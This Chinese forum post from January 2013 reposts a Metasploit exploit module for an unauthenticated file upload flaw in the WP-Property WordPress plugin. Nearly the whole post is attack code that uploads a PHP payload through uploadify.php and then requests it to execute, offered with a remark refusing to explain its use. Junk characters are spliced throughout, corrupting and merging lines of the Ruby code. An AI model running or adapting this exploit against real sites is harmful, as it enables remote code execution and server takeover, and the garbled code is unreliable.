WordPress WP-Property PHP 文件上传漏洞
$ e; g* }8 s# h
2 Q5 }1 ^4 D: J+ @; c. T0 \, E ## # This file is part of the Metasploit Framework and may be subject to" G6 E% e7 B: l& ~5 o
# v0 {4 c- o) r) o% y5 O# redistribution and commercial restrictions. Please see the Metasploit7 X# X3 [' O0 J$ p' K+ F, R$ L
% f5 w/ }1 q0 u& @0 u& P# Framework web site for more information on licensing and terms of use.2 b& C! L/ x' N" N V5 E6 \
: t6 A9 Y: Z3 A5 V6 H# http://metasploit.com/framework/ ##4 J; J5 M* h1 G& H
& I9 r* }" u L9 f
: E7 }2 u8 ~/ @: R }/ ]: j4 a% q
8 J6 U% q6 v- W % k5 b6 ^0 i i
; H, n0 Z2 z, {: s
require 'msf/core'
0 Z/ ]/ h1 r, z3 e2 w; ^9 t; Orequire 'msf/core/exploit/php_exe'' K- O+ H5 ~8 R9 S% j
4 P& N' `$ O: m% D z; k
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',6 p5 H: p& i& M5 Y1 j; X
'Description' => %q{+ K% h6 V+ V( w& Y& G
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>5 r. E, h) Y3 S% z( e
[/ `. J) |& {* S8 L- w {( ~* ?
'Sammy FORGIT', # initial discovery
) }8 b0 \+ H8 w2 T$ f; ]'James Fitts <fitts.james[at]gmail.com>' # metasploit module" i' O( p3 _& Q& n" W! d! W+ E
],& Q' S ?& ]1 w
'License' => MSF_LICENSE,
6 B5 t7 H O, s; n i! z'References' =>. D( {6 Y8 S! |: r2 W! O8 Q
[
0 o: |0 n: f* `1 `6 O[ 'OSVDB', '82656' ],; U8 F4 s7 G- k' [" r
[ 'BID', '53787' ],4 Y- q( s/ j5 z
[ 'EDB', '18987'],
& d8 C+ Z1 P( {2 l# q/ P# B[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
: z+ ?" i* b2 O& y0 B5 R( g2 ?- h],
, e1 l$ q0 N' e) H/ I& n7 G: s'Payload' =>
* P9 `! Z$ c8 B' ]& ~{
* ]& a: M6 l- s'BadChars' => "\x00",; Z# T3 Y, @4 P7 H( r
},
- [2 D1 P# Z3 _" [! L'Platform' => 'php',
( O3 r$ I5 O. K! e/ Y9 N'Arch' => ARCH_PHP,
( q5 {; ?( r# z! {3 J+ ~'Targets' =>6 S1 g* J8 X6 U! _: {' b
[* F4 M, g$ H) G0 T& P
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],) x& i" P' [, p: z* H
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
; X2 ~1 M6 w2 y9 I/ a3 i: j. Q],
8 T" U4 S8 q& N2 _8 b& \/ {'DefaultTarget' => 0,3 h! M* [% |; i1 z, z- U1 f
'DisclosureDate' => 'Mar 26 2012'))
5 ^7 o( U2 R' ]3 }$ U: E6 L" [4 _$ A& Y! a$ c
register_options(3 K* c n& K% B2 j3 K3 J
[
" c# o- a. U$ n; l! \OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])8 S8 V! `& g0 i! R& E+ J
], self.class)
; c! L- U: g' [# cend) f' ?8 a& z3 p& n/ b9 m2 ?
3 o9 @6 h1 Y* ]* S
def check9 a; q' M$ ^+ [; i) C Z( v' Z
uri = target_uri.path
: U& c+ k4 O6 a% M0 Vuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
6 }9 `+ V3 N% a s, y'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"8 ]: |* T2 l6 Q4 D6 k. A3 o+ U) o
})* m+ q) t3 R: R% p; R* z
9 p' g1 Z c& {+ v+ u6 bif not res or res.code != 200
X/ O2 G" w" A. b, j6 Ereturn Exploit::CheckCode::Unknown% K" k; N& Y( ^! M' N& E% f; f
end
" K4 A2 P3 n+ b0 \3 `! W9 d! |9 K0 Y9 d& }3 l
return Exploit::CheckCode::Appears
' s7 z% Y- {1 e$ x' C- U$ Qend
. f! ]& O, |2 i$ K% X
0 B% U" N# e- Ydef exploit
, G1 @2 n$ {- Vuri = target_uri.path
) r4 ~, a- u8 H! A s2 Ruri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)/ v5 O* t# p" [
, S" g% D0 a% i& h/ m
data = Rex::MIME::Message.new
; _0 [: f, P# |) Y( |data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")! g8 F! y( X/ E" i
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")* V6 Z5 L q$ P
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')' S5 b7 L. O8 S/ p6 ~0 L$ `: H6 E
7 G) \, t' u! J
print_status("#{peer} - Uploading payload #{@payload_name}")
& b5 L+ k- p% R# ]# y; Xres = send_request_cgi({' l2 h: u0 C' b' S" H. ~; G4 k
'method' => 'POST',# b3 \3 A- l7 }% N/ G
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
- n$ A0 r3 Z) c3 a5 J'ctype' => "multipart/form-data; boundary=#{data.bound}",
% ~( { } b( [! G. L'data' => post_data+ K: K0 D6 k8 t5 q/ p' H! R9 G3 o
})
$ |! {' D3 e. @5 ]" ~
- i D) W# T4 k- oif not res or res.code != 200 or res.body !~ /#{@payload_name}/
2 O' ]' b) l' p# Rfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")$ [0 V' u1 X }6 K m3 N
end3 c+ z' m" Q m' N; U2 |
0 ]& q. g2 o3 w9 r
upload_uri = res.body' ~$ S- D5 S1 p. l5 D. V
; k X! e* y0 m {print_status("#{peer} - Executing payload #{@payload_name}")
: l0 `- x$ z8 n1 [) Eres = send_request_raw({
2 M+ P" s& {& A x# w2 x9 s'uri' => upload_uri,
W- p, ?! F% _# c# J7 o E' o; P'method' => 'GET'7 x! L+ K. j: K- t
})+ {2 E' `4 _* r0 p" `
end# v/ g; s+ [ I1 O
end
! x. ]( f0 i% r: r2 I
" P# v. d2 C$ _! r不要问我这写的是什么 怎么利用 我是说msf.
4 h. T# K) M3 d# K8 ~' x) D! l7 L% X8 W( g" ~& S+ A: R0 V) C
|
发表于 2013-1-4 19:51:30
收藏
支持
反对